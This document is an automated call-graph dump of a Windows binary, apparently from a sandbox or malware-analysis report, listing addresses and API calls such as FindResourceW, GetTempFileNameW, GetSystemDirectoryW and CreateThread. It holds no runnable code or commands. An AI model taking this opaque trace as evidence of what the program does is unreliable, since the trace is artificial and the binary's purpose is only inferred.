RtlFreeHeap 7692->7694 7696 401e4e 7694->7696 7697 40e5f0 RtlFreeHeap 7696->7697 7699 401e57 7697->7699 7698 401ddf 8229 405160 7698->8229 7701 40e5f0 RtlFreeHeap 7699->7701 7702 40119c 7701->7702 7702->7529 7702->7530 7703 401dea 7703->7683 8232 40e520 GetLastError TlsGetValue SetLastError 7703->8232 7705 401e03 8233 40e520 GetLastError TlsGetValue SetLastError 7705->8233 7707 401e0b 7708 409872 21 API calls 7707->7708 7709 401e17 7708->7709 7710 40e560 3 API calls 7709->7710 7710->7683 7712 403f59 7711->7712 7712->7712 7713 40e660 21 API calls 7712->7713 7729 403f6b 7713->7729 7714 40e520 GetLastError TlsGetValue SetLastError 7739 403fec 7714->7739 7715 405dc0 3 API calls 7715->7729 7716 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7716->7729 7717 405dc0 3 API calls 7717->7739 7718 40e520 GetLastError TlsGetValue SetLastError 7730 40406d 7718->7730 7719 40e520 GetLastError TlsGetValue SetLastError 7719->7729 7720 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7720->7739 7721 405dc0 3 API calls 7721->7730 7722 405dc0 3 API calls 7724 4040ee 7722->7724 7723 40e520 GetLastError TlsGetValue SetLastError 7731 40416f 7723->7731 7724->7722 7724->7731 7735 40e520 GetLastError TlsGetValue SetLastError 7724->7735 7747 40e6c0 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 7724->7747 7754 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7724->7754 7725 40e6c0 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 7725->7729 7727 40e520 GetLastError TlsGetValue SetLastError 7740 4041f0 7727->7740 7728 40e520 GetLastError TlsGetValue SetLastError 7732 404275 7728->7732 7729->7715 7729->7716 7729->7719 7729->7725 7729->7739 7730->7718 7730->7721 7730->7724 7734 40e6c0 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 7730->7734 7752 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7730->7752 7731->7723 7731->7740 7748 40e6c0 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 7731->7748 7759 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7731->7759 8264 405dc0 7731->8264 7732->7728 7737 4042fa 7732->7737 7742 405dc0 3 API calls 7732->7742 7749 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7732->7749 7761 40e6c0 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 7732->7761 7733 40e6c0 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 7733->7739 7734->7730 7735->7724 7736 405dc0 3 API calls 7736->7740 7743 40e520 GetLastError TlsGetValue SetLastError 7737->7743 7750 405dc0 3 API calls 7737->7750 7755 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7737->7755 7766 40e6c0 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 7737->7766 7774 40437f 7737->7774 7738 404404 8267 40e520 GetLastError TlsGetValue SetLastError 7738->8267 7739->7714 7739->7717 7739->7720 7739->7730 7739->7733 7740->7727 7740->7732 7740->7736 7741 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7740->7741 7760 40e6c0 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 7740->7760 7741->7740 7742->7732 7743->7737 7744 40e520 GetLastError TlsGetValue SetLastError 7744->7774 7746 404410 7751 40e6c0 4 API calls 7746->7751 7747->7724 7748->7731 7749->7732 7750->7737 7753 404418 7751->7753 7752->7730 7757 40e6c0 4 API calls 7753->7757 7754->7724 7755->7737 7756 405dc0 3 API calls 7756->7774 7758 404422 7757->7758 7762 40e560 3 API calls 7758->7762 7759->7731 7760->7740 7761->7732 7763 40442e 7762->7763 8268 40e520 GetLastError TlsGetValue SetLastError 7763->8268 7765 404434 8269 403221 7765->8269 7766->7737 7769 40e560 3 API calls 7771 40444d 7769->7771 7770 40e6c0 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 7770->7774 7773 40985e 17 API calls 7771->7773 7772 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7772->7774 7775 404452 GetModuleHandleW 7773->7775 7774->7738 7774->7744 7774->7756 7774->7770 7774->7772 8362 40e520 GetLastError TlsGetValue SetLastError 7775->8362 7777 40446b 8363 40e520 GetLastError TlsGetValue SetLastError 7777->8363 7779 404473 8364 40e520 GetLastError TlsGetValue SetLastError 7779->8364 7781 40447b 8365 40e520 GetLastError TlsGetValue SetLastError 7781->8365 7783 404483 7784 40d780 8 API calls 7783->7784 7785 404495 7784->7785 8366 405182 TlsGetValue 7785->8366 7787 40449a 7788 405eb0 6 API calls 7787->7788 7789 4044a2 7788->7789 7790 40e560 3 API calls 7789->7790 7791 4044ac 7790->7791 8367 40e520 GetLastError TlsGetValue SetLastError 7791->8367 7793 4044b2 8368 40e520 GetLastError TlsGetValue SetLastError 7793->8368 7795 4044ba 8369 40e520 GetLastError TlsGetValue SetLastError 7795->8369 7797 4044c2 8370 40e520 GetLastError TlsGetValue SetLastError 7797->8370 7799 4044ca 7800 40d780 8 API calls 7799->7800 7801 4044da 7800->7801 8371 405182 TlsGetValue 7801->8371 7803 4044df 7804 405eb0 6 API calls 7803->7804 7805 4044e7 7804->7805 7806 40e560 3 API calls 7805->7806 7807 4044f1 7806->7807 8372 402e49 7807->8372 7811 404504 8389 402150 7811->8389 7814 4051a0 3 API calls 7815 404514 7814->7815 8503 40196c 7815->8503 7821 404528 8594 403539 7821->8594 7824 40e560 3 API calls 7825 40454e PathRemoveBackslashW 7824->7825 7826 404562 7825->7826 8722 40e520 GetLastError TlsGetValue SetLastError 7826->8722 7828 404568 8723 40e520 GetLastError TlsGetValue SetLastError 7828->8723 7830 404570 8724 402ba6 7830->8724 7834 404582 8754 405182 TlsGetValue 7834->8754 7836 40458b 8755 4099a5 7836->8755 7839 4051a0 3 API calls 7840 404599 7839->7840 8759 40e520 GetLastError TlsGetValue SetLastError 7840->8759 7842 4045a5 7843 40e6c0 4 API calls 7842->7843 7844 4045ad 7843->7844 7845 40e6c0 4 API calls 7844->7845 7846 4045b9 7845->7846 7847 40e560 3 API calls 7846->7847 7848 4045c5 7847->7848 8760 403801 7848->8760 7852 4045d0 8954 401e66 7852->8954 7855 40e560 3 API calls 7856 4045e5 7855->7856 7857 4045f0 7856->7857 7858 404608 7856->7858 9084 40548c CreateThread 7857->9084 9094 402c55 7858->9094 7862 404611 9000 403c83 7862->9000 10392 40a54f 7885->10392 7888 40a524 7888->7502 7889 40a48b HeapAlloc 7891 40a513 HeapFree 7889->7891 7892 40a4ae 7889->7892 7891->7888 10403 40de99 7892->10403 7896 40a9e7 HeapAlloc 7895->7896 7897 40a9fc 7895->7897 7896->7897 7898 40de99 11 API calls 7897->7898 7899 40aa4f 7898->7899 7899->7506 7901 40e660 21 API calls 7900->7901 7902 402fba 7901->7902 10436 40e520 GetLastError TlsGetValue SetLastError 7902->10436 7904 402fc0 10437 40e520 GetLastError TlsGetValue SetLastError 7904->10437 7906 402fc8 10438 40e520 GetLastError TlsGetValue SetLastError 7906->10438 7908 402fd0 10439 40e520 GetLastError TlsGetValue SetLastError 7908->10439 7910 402fd8 7911 40d780 8 API calls 7910->7911 7912 402fea 7911->7912 10440 405182 TlsGetValue 7912->10440 7914 402fef 7915 405eb0 6 API calls 7914->7915 7916 402ff7 7915->7916 7917 40e560 3 API calls 7916->7917 7918 403001 7917->7918 10441 40e520 GetLastError TlsGetValue SetLastError 7918->10441 7920 403007 10442 40e520 GetLastError TlsGetValue SetLastError 7920->10442 7922 40300f 10443 40e520 GetLastError TlsGetValue SetLastError 7922->10443 7924 403017 10444 40e520 GetLastError TlsGetValue SetLastError 7924->10444 7926 40301f 7927 40d780 8 API calls 7926->7927 7928 40302f 7927->7928 10445 405182 TlsGetValue 7928->10445 7930 403034 7931 405eb0 6 API calls 7930->7931 7932 40303c 7931->7932 7933 40e560 3 API calls 7932->7933 7934 403046 7933->7934 7935 402e49 35 API calls 7934->7935 7936 40304e 7935->7936 10446 40e520 GetLastError TlsGetValue SetLastError 7936->10446 7938 403058 7939 402150 122 API calls 7938->7939 7940 403063 7939->7940 7941 4051a0 3 API calls 7940->7941 7942 403068 7941->7942 10447 40e520 GetLastError TlsGetValue SetLastError 7942->10447 7944 40306e 10448 40e520 GetLastError TlsGetValue SetLastError 7944->10448 7946 403076 7947 409355 33 API calls 7946->7947 7948 403089 7947->7948 7949 40e560 3 API calls 7948->7949 7950 403093 7949->7950 7951 4031ea 7950->7951 10449 40e520 GetLastError TlsGetValue SetLastError 7950->10449 7951->7951 7953 4030aa 10450 40e520 GetLastError TlsGetValue SetLastError 7953->10450 7955 4030b2 10451 40e520 GetLastError TlsGetValue SetLastError 7955->10451 7957 4030ba 10452 40e520 GetLastError TlsGetValue SetLastError 7957->10452 7959 4030c2 7960 40d780 8 API calls 7959->7960 7961 4030d4 7960->7961 10453 405182 TlsGetValue 7961->10453 7963 4030d9 7964 405eb0 6 API calls 7963->7964 7965 4030e1 7964->7965 7966 40e560 3 API calls 7965->7966 7967 4030eb 7966->7967 10454 40e520 GetLastError TlsGetValue SetLastError 7967->10454 7969 4030f1 10455 40e520 GetLastError TlsGetValue SetLastError 7969->10455 7971 4030f9 10456 40e520 GetLastError TlsGetValue SetLastError 7971->10456 7973 403101 10457 40e520 GetLastError TlsGetValue SetLastError 7973->10457 7975 403109 7976 40d780 8 API calls 7975->7976 7977 40311b 7976->7977 10458 405182 TlsGetValue 7977->10458 7979 403120 7980 405eb0 6 API calls 7979->7980 7981 403128 7980->7981 7982 40e560 3 API calls 7981->7982 7983 403132 7982->7983 10459 40e520 GetLastError TlsGetValue SetLastError 7983->10459 7985 403138 7986 403e37 84 API calls 7985->7986 7987 403148 7986->7987 7988 40e560 3 API calls 7987->7988 7989 403154 7988->7989 10460 40e520 GetLastError TlsGetValue SetLastError 7989->10460 7991 40315a 7992 403e37 84 API calls 7991->7992 7993 40316a 7992->7993 7994 40e560 3 API calls 7993->7994 7995 403174 PathAddBackslashW 7994->7995 10461 40e520 GetLastError TlsGetValue SetLastError 7995->10461 7997 403183 10462 40e520 GetLastError TlsGetValue SetLastError 7997->10462 7999 403193 8000 40e6c0 4 API calls 7999->8000 8001 40319b 8000->8001 8002 40e6c0 4 API calls 8001->8002 8003 4031a7 8002->8003 10463 405182 TlsGetValue 8003->10463 8005 4031ac 8006 4023b8 34 API calls 8005->8006 8007 4031b4 8006->8007 8008 4051a0 3 API calls 8007->8008 8009 4031b9 8008->8009 10464 40e520 GetLastError TlsGetValue SetLastError 8009->10464 8011 4031c3 8012 40e6c0 4 API calls 8011->8012 8013 4031cb 8012->8013 8014 40e560 3 API calls 8013->8014 8015 4031d7 PathRemoveBackslashW 8014->8015 8016 402c55 141 API calls 8015->8016 8016->7951 8031->7540 8032->7543 8034 40d9e2 8033->8034 8035 40da20 TlsGetValue HeapReAlloc TlsSetValue 8034->8035 8036 40d9f8 TlsAlloc HeapAlloc TlsSetValue 8034->8036 8037 40da60 8035->8037 8038 40da5c 8035->8038 8036->8035 8043 40e1f2 HeapAlloc 8037->8043 8038->8037 8040 409674 8038->8040 8042 40dbac HeapAlloc HeapAlloc InitializeCriticalSection 8040->8042 8042->7549 8044 40da6c 8043->8044 8044->8040 8046 40e7e1 wcslen 8045->8046 8047 40e84d 8045->8047 8048 40e816 HeapReAlloc 8046->8048 8049 40e7f8 HeapAlloc 8046->8049 8050 40e855 HeapFree 8047->8050 8051 40e838 8047->8051 8048->8051 8049->8051 8050->8051 8051->7554 8053 40ab46 8052->8053 8057 40ab27 8052->8057 8054 40aa6b 8053->8054 8055 40ddcb 3 API calls 8053->8055 8059 40dfc6 8054->8059 8055->8053 8057->8054 8072 41242a 8057->8072 8077 40ddcb 8057->8077 8060 40dfd3 EnterCriticalSection 8059->8060 8061 40e038 8059->8061 8063 40e02e LeaveCriticalSection 8060->8063 8064 40dfef 8060->8064 8087 40dd5d 8061->8087 8065 40aa73 8063->8065 8067 40dfc6 4 API calls 8064->8067 8065->7561 8065->7565 8070 40dff9 HeapFree 8067->8070 8068 40e044 DeleteCriticalSection 8069 40e04e HeapFree 8068->8069 8069->8065 8070->8063 8073 412525 8072->8073 8076 412442 8072->8076 8073->8057 8074 41242a RtlFreeHeap 8074->8076 8076->8073 8076->8074 8084 40e5f0 8076->8084 8078 40ddd8 EnterCriticalSection 8077->8078 8081 40dde2 8077->8081 8078->8081 8079 40de94 8079->8057 8080 40de8a LeaveCriticalSection 8080->8079 8082 40de4b 8081->8082 8083 40de35 HeapFree 8081->8083 8082->8079 8082->8080 8083->8082 8085 40e5fb RtlFreeHeap 8084->8085 8086 40e60e 8084->8086 8085->8086 8086->8076 8088 40dd75 8087->8088 8089 40dd6b EnterCriticalSection 8087->8089 8090 40dd92 8088->8090 8091 40dd7c HeapFree 8088->8091 8089->8088 8092 40dd98 HeapFree 8090->8092 8093 40ddae 8090->8093 8091->8090 8091->8091 8092->8092 8092->8093 8094 40ddc5 8093->8094 8095 40ddbb LeaveCriticalSection 8093->8095 8094->8068 8094->8069 8095->8094 8097 40e277 8096->8097 8101 40e3c2 8096->8101 8097->7569 8097->7571 8098 40e3ed HeapFree 8098->8097 8099 40e3eb 8099->8098 8100 41242a RtlFreeHeap 8100->8101 8101->8098 8101->8099 8101->8100 8103 40e68a TlsGetValue 8102->8103 8104 40e66c 8102->8104 8106 402ef9 8103->8106 8107 40e69b 8103->8107 8105 40e4d0 5 API calls 8104->8105 8108 40e671 TlsGetValue 8105->8108 8114 4051a0 8106->8114 8146 40ed40 HeapAlloc HeapAlloc TlsSetValue 8107->8146 8137 412722 8108->8137 8111 40e6a0 TlsGetValue 8113 412722 13 API calls 8111->8113 8113->8106 8147 40ee20 GetLastError TlsGetValue SetLastError 8114->8147 8116 4051ab 8116->7583 8117->7585 8118->7587 8119->7589 8120->7591 8123 40d7ad 8121->8123 8148 40d8a0 8123->8148 8125 405182 TlsGetValue 8125->7595 8127 405ebd 8126->8127 8158 40e880 TlsGetValue 8127->8158 8130 40e900 3 API calls 8131 405ed1 8130->8131 8133 405edd 8131->8133 8160 40ea10 TlsGetValue 8131->8160 8134 405f0d 8133->8134 8135 405f00 CharUpperW 8133->8135 8134->7597 8135->7597 8136->7599 8138 412732 TlsAlloc InitializeCriticalSection 8137->8138 8139 41274e TlsGetValue 8137->8139 8138->8139 8140 412764 HeapAlloc 8139->8140 8141 4127eb HeapAlloc 8139->8141 8142 41277e EnterCriticalSection 8140->8142 8143 40e688 8140->8143 8141->8143 8144 412790 7 API calls 8142->8144 8145 41278e 8142->8145 8143->8106 8144->8141 8145->8144 8146->8111 8147->8116 8149 40d8ac 8148->8149 8152 40e900 TlsGetValue 8149->8152 8153 40e91b 8152->8153 8154 40e941 RtlReAllocateHeap 8153->8154 8155 40e974 8153->8155 8156 402f85 8154->8156 8155->8156 8157 40e990 HeapReAlloc 8155->8157 8156->8125 8157->8156 8159 405ec5 8158->8159 8159->8130 8160->8133 8161->7608 8162->7610 8163->7612 8165 40e900 3 API calls 8164->8165 8166 4096aa GetModuleFileNameW wcscmp 8165->8166 8167 4096e5 8166->8167 8168 4096cd memmove 8166->8168 8234 40ea90 TlsGetValue 8167->8234 8168->8167 8170 401bd6 8171 405182 TlsGetValue 8170->8171 8171->7616 8172->7624 8173->7626 8174->7628 8175->7631 8176->7633 8177->7635 8179 405e1d 8178->8179 8180 40e880 TlsGetValue 8179->8180 8181 405e40 8180->8181 8182 40e900 3 API calls 8181->8182 8183 405e4c 8182->8183 8184 401cfa 8183->8184 8235 40ea10 TlsGetValue 8183->8235 8186 405182 TlsGetValue 8184->8186 8186->7641 8236 40d700 8187->8236 8190 405182 TlsGetValue 8190->7645 8191->7651 8193 40e6e2 8192->8193 8194 40e6d3 wcslen 8192->8194 8195 40e900 3 API calls 8193->8195 8194->8193 8196 40e6ed 8195->8196 8196->7653 8197->7657 8198->7659 8199->7661 8200->7663 8201->7667 8202->7673 8203->7675 8205 405f2e 8204->8205 8206 40e880 TlsGetValue 8205->8206 8207 405f4a 8206->8207 8208 40e900 3 API calls 8207->8208 8209 405f56 8208->8209 8211 405f62 8209->8211 8252 40ea10 TlsGetValue 8209->8252 8211->7677 8253 40d968 TlsGetValue 8212->8253 8217 40e520 GetLastError TlsGetValue SetLastError 8217->7686 8218->7689 8220 40d968 16 API calls 8219->8220 8221 409885 8220->8221 8222 40973a 17 API calls 8221->8222 8223 409898 8222->8223 8224 40e900 3 API calls 8223->8224 8225 4098a6 8224->8225 8262 40ea90 TlsGetValue 8225->8262 8227 401dda 8228 40e720 TlsGetValue 8227->8228 8228->7698 8263 40ede0 TlsGetValue 8229->8263 8231 40516a 8231->7703 8232->7705 8233->7707 8234->8170 8235->8184 8237 40d712 8236->8237 8238 40d75d 8237->8238 8241 40d732 8237->8241 8239 40d8a0 3 API calls 8238->8239 8240 401d07 8239->8240 8240->8190 8245 412840 8241->8245 8243 40d738 8251 412830 free 8243->8251 8246 4128b4 malloc 8245->8246 8247 41284c WideCharToMultiByte 8245->8247 8246->8243 8247->8246 8249 412880 malloc 8247->8249 8249->8246 8250 412892 WideCharToMultiByte 8249->8250 8250->8243 8251->8238 8252->8211 8254 40d97b HeapAlloc TlsSetValue 8253->8254 8257 409869 8253->8257 8255 40d9a7 8254->8255 8256 412722 13 API calls 8255->8256 8256->8257 8258 40973a 8257->8258 8259 40d968 16 API calls 8258->8259 8260 40974b GetCommandLineW 8259->8260 8261 401dbc 8260->8261 8261->7683 8261->8217 8262->8227 8263->8231 8265 40e900 3 API calls 8264->8265 8266 405dcb 8265->8266 8266->7731 8267->7746 8268->7765 8270 403227 8269->8270 8270->8270 8271 40e660 21 API calls 8270->8271 8272 403239 8271->8272 8273 4051a0 3 API calls 8272->8273 8274 403242 8273->8274 9174 405060 8274->9174 8277 405060 2 API calls 8278 40325b 8277->8278 9177 402b6d 8278->9177 8281 403264 9182 405573 GetVersionExW 8281->9182 8282 403277 8285 403281 8282->8285 8286 4033e7 8282->8286 9188 40e520 GetLastError TlsGetValue SetLastError 8285->9188 9220 40e520 GetLastError TlsGetValue SetLastError 8286->9220 8289 4033ed 9221 40e520 GetLastError TlsGetValue SetLastError 8289->9221 8290 403287 9189 40e520 GetLastError TlsGetValue SetLastError 8290->9189 8293 4033f5 8295 4062c0 3 API calls 8293->8295 8294 40328f 9190 4062c0 8294->9190 8298 403401 8295->8298 8300 40e560 3 API calls 8298->8300 8299 40e560 3 API calls 8301 4032a5 GetWindowsDirectoryW PathAddBackslashW 8299->8301 8302 40340b GetSystemDirectoryW PathAddBackslashW 8300->8302 9193 40e520 GetLastError TlsGetValue SetLastError 8301->9193 8353 4033e5 8302->8353 8304 4032c6 8307 40e6c0 4 API calls 8304->8307 8306 40342c 8308 40e6c0 4 API calls 8306->8308 8309 4032ce 8307->8309 8310 403434 8308->8310 8311 40e6c0 4 API calls 8309->8311 9223 405170 TlsGetValue 8310->9223 8313 4032d9 8311->8313 8315 40e560 3 API calls 8313->8315 8314 40343b 8318 40e5f0 RtlFreeHeap 8314->8318 8316 4032e3 PathAddBackslashW 8315->8316 9194 40e520 GetLastError TlsGetValue SetLastError 8316->9194 8320 403453 8318->8320 8319 4032f6 8321 40e6c0 4 API calls 8319->8321 8322 40e5f0 RtlFreeHeap 8320->8322 8324 4032fe 8321->8324 8323 40345b 8322->8323 8325 40e5f0 RtlFreeHeap 8323->8325 8326 40e6c0 4 API calls 8324->8326 8328 403464 8325->8328 8327 403308 8326->8327 8329 40e560 3 API calls 8327->8329 8330 40e5f0 RtlFreeHeap 8328->8330 8331 403312 8329->8331 8332 40346d 8330->8332 9195 40e520 GetLastError TlsGetValue SetLastError 8331->9195 8334 40e5f0 RtlFreeHeap 8332->8334 8336 403476 8334->8336 8335 40331c 8337 40e6c0 4 API calls 8335->8337 8336->7769 8338 403324 8337->8338 8339 40e6c0 4 API calls 8338->8339 8340 40332e 8339->8340 8341 40e6c0 4 API calls 8340->8341 8342 403338 8341->8342 8343 40e560 3 API calls 8342->8343 8344 403342 8343->8344 9196 40b440 8344->9196 8346 403350 8347 403366 8346->8347 9206 40b050 8346->9206 8349 40b440 11 API calls 8347->8349 8350 40337e 8349->8350 8351 403394 8350->8351 8352 40b050 11 API calls 8350->8352 8351->8353 9218 40e520 GetLastError TlsGetValue SetLastError 8351->9218 8352->8351 9222 40e520 GetLastError TlsGetValue SetLastError 8353->9222 8355 4033b0 9219 40e520 GetLastError TlsGetValue SetLastError 8355->9219 8357 4033b8 8358 4062c0 3 API calls 8357->8358 8359 4033c4 8358->8359 8360 40e560 3 API calls 8359->8360 8361 4033ce GetSystemDirectoryW PathAddBackslashW 8360->8361 8361->8353 8362->7777 8363->7779 8364->7781 8365->7783 8366->7787 8367->7793 8368->7795 8369->7797 8370->7799 8371->7803 8373 40e660 21 API calls 8372->8373 8374 402e56 8373->8374 8375 405060 2 API calls 8374->8375 8376 402e62 FindResourceW 8375->8376 8377 402e81 8376->8377 8378 402e9d 8376->8378 9269 402664 8377->9269 9280 40a220 8378->9280 8382 402eac 9283 40ee60 8382->9283 8386 40e5f0 RtlFreeHeap 8387 402ee7 8386->8387 8388 40e520 GetLastError TlsGetValue SetLastError 8387->8388 8388->7811 8390 40e660 21 API calls 8389->8390 8391 40215c 8390->8391 8392 4051a0 3 API calls 8391->8392 8393 402165 8392->8393 8485 40235a 8393->8485 9309 40e520 GetLastError TlsGetValue SetLastError 8393->9309 8396 402184 9310 40e520 GetLastError TlsGetValue SetLastError 8396->9310 8397 402370 8399 40e6c0 4 API calls 8397->8399 8401 402378 8399->8401 8400 40218c 9311 40e520 GetLastError TlsGetValue SetLastError 8400->9311 9416 405170 TlsGetValue 8401->9416 8404 402194 9312 40e520 GetLastError TlsGetValue SetLastError 8404->9312 8405 40237f 8408 40e5f0 RtlFreeHeap 8405->8408 8407 40219c 9313 40a290 8407->9313 8410 402397 8408->8410 8411 40e5f0 RtlFreeHeap 8410->8411 8413 4023a0 8411->8413 8412 4021b0 9322 405182 TlsGetValue 8412->9322 8415 40e5f0 RtlFreeHeap 8413->8415 8417 4023a8 8415->8417 8416 4021b5 9323 406060 8416->9323 8419 40e5f0 RtlFreeHeap 8417->8419 8422 4023b1 8419->8422 8421 40e560 3 API calls 8423 4021c7 8421->8423 8422->7814 9326 40e520 GetLastError TlsGetValue SetLastError 8423->9326 8425 4021cd 9327 40e520 GetLastError TlsGetValue SetLastError 8425->9327 8427 4021d5 9328 40e520 GetLastError TlsGetValue SetLastError 8427->9328 8429 4021dd 9329 40e520 GetLastError TlsGetValue SetLastError 8429->9329 8431 4021e5 8432 40a290 5 API calls 8431->8432 8433 4021fc 8432->8433 9330 405182 TlsGetValue 8433->9330 8435 402201 8436 406060 5 API calls 8435->8436 8437 402209 8436->8437 8438 40e560 3 API calls 8437->8438 8439 402213 8438->8439 9331 40e520 GetLastError TlsGetValue SetLastError 8439->9331 8441 402219 9332 40e520 GetLastError TlsGetValue SetLastError 8441->9332 8443 402221 9333 40e520 GetLastError TlsGetValue SetLastError 8443->9333 8445 402234 9334 40e520 GetLastError TlsGetValue SetLastError 8445->9334 8447 40223c 9335 4057f0 8447->9335 8449 402252 9351 40e720 TlsGetValue 8449->9351 8451 402257 9352 40e520 GetLastError TlsGetValue SetLastError 8451->9352 8453 40225d 9353 40e520 GetLastError TlsGetValue SetLastError 8453->9353 8455 402265 8456 4057f0 9 API calls 8455->8456 8457 40227b 8456->8457 9354 405182 TlsGetValue 8457->9354 8459 402280 9355 405182 TlsGetValue 8459->9355 8461 402288 9356 408f69 8461->9356 8463 402291 8464 40e560 3 API calls 8463->8464 8465 40229b 8464->8465 8466 40235c 8465->8466 8467 4022ac 8465->8467 8468 401fba 36 API calls 8466->8468 9398 40e520 GetLastError TlsGetValue SetLastError 8467->9398 8468->8485 8470 4022b2 9399 40e520 GetLastError TlsGetValue SetLastError 8470->9399 8472 4022ba 9400 40e520 GetLastError TlsGetValue SetLastError 8472->9400 8474 4022c7 9401 40e520 GetLastError TlsGetValue SetLastError 8474->9401 8476 4022cf 8477 406060 5 API calls 8476->8477 8478 4022da 8477->8478 9402 405182 TlsGetValue 8478->9402 8480 4022df 8481 40d780 8 API calls 8480->8481 8482 4022e7 8481->8482 8483 40e560 3 API calls 8482->8483 8484 4022f1 8483->8484 8484->8485 9403 40e520 GetLastError TlsGetValue SetLastError 8484->9403 9415 40e520 GetLastError TlsGetValue SetLastError 8485->9415 8487 402307 9404 40e520 GetLastError TlsGetValue SetLastError 8487->9404 8489 402314 9405 40e520 GetLastError TlsGetValue SetLastError 8489->9405 8491 40231c 8492 4057f0 9 API calls 8491->8492 8493 402332 8492->8493 9406 40e720 TlsGetValue 8493->9406 8495 402337 9407 405182 TlsGetValue 8495->9407 8497 402342 9408 408e27 8497->9408 8500 4051a0 3 API calls 8501 402350 8500->8501 8502 401fba 36 API calls 8501->8502 8502->8485 8504 40e660 21 API calls 8503->8504 8523 40197a 8504->8523 8505 4019fb 8506 40a220 RtlAllocateHeap 8505->8506 8507 401a05 8506->8507 9467 40e520 GetLastError TlsGetValue SetLastError 8507->9467 8509 401a0f 9468 40e520 GetLastError TlsGetValue SetLastError 8509->9468 8511 405dc0 3 API calls 8511->8523 8512 401a17 9469 40add6 8512->9469 8513 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8513->8523 8516 40e520 GetLastError TlsGetValue SetLastError 8516->8523 8517 40e560 3 API calls 8518 401a28 GetTempFileNameW 8517->8518 9478 40e520 GetLastError TlsGetValue SetLastError 8518->9478 8520 401a46 9479 40e520 GetLastError TlsGetValue SetLastError 8520->9479 8521 40e6c0 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 8521->8523 8523->8505 8523->8511 8523->8513 8523->8516 8523->8521 8524 401a4e 8525 40a240 4 API calls 8524->8525 8526 401a59 8525->8526 8527 40e560 3 API calls 8526->8527 8528 401a65 8527->8528 9480 40ae67 8528->9480 8534 401a9b 9489 40e520 GetLastError TlsGetValue SetLastError 8534->9489 8536 401aa3 8537 40a240 4 API calls 8536->8537 8538 401aae 8537->8538 8539 40e560 3 API calls 8538->8539 8540 401aba 8539->8540 8541 40ae67 2 API calls 8540->8541 8542 401ac5 8541->8542 8543 40ad45 3 API calls 8542->8543 8544 401ad0 GetTempFileNameW PathAddBackslashW 8543->8544 9490 40e520 GetLastError TlsGetValue SetLastError 8544->9490 8546 401afb 9491 40e520 GetLastError TlsGetValue SetLastError 8546->9491 8548 401b03 8549 40a240 4 API calls 8548->8549 8550 401b0e 8549->8550 8551 40e560 3 API calls 8550->8551 8552 401b1a 8551->8552 8553 40ae67 2 API calls 8552->8553 8554 401b25 PathRenameExtensionW GetTempFileNameW 8553->8554 9492 40e520 GetLastError TlsGetValue SetLastError 8554->9492 8556 401b54 9493 40e520 GetLastError TlsGetValue SetLastError 8556->9493 8558 401b5c 8559 40a240 4 API calls 8558->8559 8560 401b67 8559->8560 8561 40e560 3 API calls 8560->8561 8562 401b73 8561->8562 9494 40a200 HeapFree 8562->9494 8564 401b7c 8565 40e5f0 RtlFreeHeap 8564->8565 8566 401b89 8565->8566 8567 40e5f0 RtlFreeHeap 8566->8567 8568 401b92 8567->8568 8569 40e5f0 RtlFreeHeap 8568->8569 8570 401b9b 8569->8570 8571 40469c 8570->8571 8572 40e660 21 API calls 8571->8572 8576 4046a9 8572->8576 8573 40472a 9501 40e520 GetLastError TlsGetValue SetLastError 8573->9501 8574 40e520 GetLastError TlsGetValue SetLastError 8574->8576 8576->8573 8576->8574 8578 405dc0 3 API calls 8576->8578 8585 40e6c0 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 8576->8585 8590 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8576->8590 8577 404730 8579 403539 98 API calls 8577->8579 8578->8576 8580 404746 8579->8580 8581 40e560 3 API calls 8580->8581 8582 404750 8581->8582 9502 40afda 8582->9502 8585->8576 8586 40e5f0 RtlFreeHeap 8587 404764 8586->8587 8588 40e5f0 RtlFreeHeap 8587->8588 8589 40476d 8588->8589 8591 40e5f0 RtlFreeHeap 8589->8591 8590->8576 8592 404522 8591->8592 8593 40e520 GetLastError TlsGetValue SetLastError 8592->8593 8593->7821 8595 40e660 21 API calls 8594->8595 8596 403543 8595->8596 8597 4051a0 3 API calls 8596->8597 8598 40354c 8597->8598 8599 405060 2 API calls 8598->8599 8600 403558 8599->8600 8601 403563 8600->8601 8602 403587 8600->8602 9507 40e520 GetLastError TlsGetValue SetLastError 8601->9507 8603 403591 8602->8603 8604 4035b4 8602->8604 9515 40e520 GetLastError TlsGetValue SetLastError 8603->9515 8607 4035e7 8604->8607 8608 4035be 8604->8608 8611 4035f1 8607->8611 8612 40361a 8607->8612 9516 40e520 GetLastError TlsGetValue SetLastError 8608->9516 8609 403569 9508 40e520 GetLastError TlsGetValue SetLastError 8609->9508 8610 40359d 8615 40e6c0 4 API calls 8610->8615 9534 40e520 GetLastError TlsGetValue SetLastError 8611->9534 8619 403624 8612->8619 8620 40364d 8612->8620 8621 4035a5 8615->8621 8617 4035c4 9517 40e520 GetLastError TlsGetValue SetLastError 8617->9517 8618 403571 9509 40ae75 8618->9509 9536 40e520 GetLastError TlsGetValue SetLastError 8619->9536 8623 403680 8620->8623 8624 403657 8620->8624 8630 40e560 3 API calls 8621->8630 8622 4035f7 9535 40e520 GetLastError TlsGetValue SetLastError 8622->9535 8628 4036b3 8623->8628 8629 40368a 8623->8629 9538 40e520 GetLastError TlsGetValue SetLastError 8624->9538 8640 4036e6 8628->8640 8641 4036bd 8628->8641 9540 40e520 GetLastError TlsGetValue 